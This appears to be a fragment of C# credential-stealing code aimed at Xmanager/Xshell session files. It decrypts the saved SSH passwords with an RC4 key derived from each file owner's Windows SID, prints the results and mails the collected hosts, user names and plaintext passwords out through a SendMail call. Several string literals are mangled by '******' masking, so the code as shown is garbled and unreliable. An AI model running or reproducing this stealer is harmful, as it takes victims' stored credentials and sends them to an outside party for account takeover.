public void Xmangager(string path, string UserSid) { string sourse = File.ReadAllText(path); string arg = MidStrEx(sourse, "Host=", "\r\n"); string arg2 = MidStrEx(sourse, "[CONNECTION]\r\nPort=", "\r\n"); string arg3 = MidStrEx(sourse, "UserName="******"\r\n"); string text = MidStrEx(sourse, "Password="******"\r\n"); string arg4 = MidStrEx(sourse, "[SessionInfo]\r\nVersion=", "\r\n"); if (text != null && text != "") { byte[] array = Convert.FromBase64String(text); byte[] pwd = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(UserSid)); byte[] array2 = new byte[array.Length - 32]; Array.Copy(array, 0, array2, 0, array.Length - 32); byte[] bytes = RC4.Decrypt(pwd, array2); Console.WriteLine("[+] Session File:" + path); Console.WriteLine(" Host: {0}", arg); Console.WriteLine(" Port: {0}", arg2); Console.WriteLine(" UserName: {0}", arg3); Console.WriteLine(" Version: {0}", arg4); Console.WriteLine(" Password: {0}", text); Console.WriteLine(" UserSid(Key): {0}", UserSid); Console.WriteLine(" Decrypt: {0}", Encoding.ASCII.GetString(bytes)); } }
public static void XmangagerPwd() { List <string> xsh_pathlist = XmangagerCrypt.checkPath(); StringBuilder strbuf = new StringBuilder(); foreach (string path in xsh_pathlist) { FileInfo fileInfo = new FileInfo(path); FileSecurity fileSecurity = fileInfo.GetAccessControl(); IdentityReference identityReference = fileSecurity.GetOwner(typeof(NTAccount)); int idx = identityReference.Value.IndexOf('\\'); if (idx == -1) { idx = identityReference.Value.IndexOf('@'); } string userName = identityReference.Value.Substring(idx + 1); string userSid = null; try { DirectoryEntry obDirEntry = new DirectoryEntry("WinNT://" + identityReference.Value.Replace(@"\", @"/")); PropertyCollection coll = obDirEntry.Properties; object obVal = coll["objectSid"].Value; userSid = userName + XmangagerCrypt.ConvertByteToStringSid((Byte[])obVal);//获取该所有者的SID } catch (System.Runtime.InteropServices.COMException) { continue; } using (StreamReader sr = new StreamReader(path)) { string Host = "null"; string UserName = "******"; string password = "******"; string rawPass; string pattern = @"Password=(.*?)"; while ((rawPass = sr.ReadLine()) != null) { if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, @"Host=(.*?)")) { Host = rawPass.Replace("Host=", ""); } if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, pattern)) { rawPass = rawPass.Replace("Password="******""); if (rawPass.Equals("")) { continue; } byte[] data = Convert.FromBase64String(rawPass); byte[] Key = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(userSid)); byte[] passData = new byte[data.Length - 0x20]; Array.Copy(data, 0, passData, 0, data.Length - 0x20); byte[] decrypted = RC4.Decrypt(Key, passData); password = Encoding.ASCII.GetString(decrypted); } if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, @"UserName=(.*?)")) { UserName = rawPass.Replace("UserName="******""); } } strbuf.Append("Host: " + Host + " UserName: "******" Decrypt: " + password); } strbuf.Append(Environment.NewLine); } SendMail.Send(strbuf); }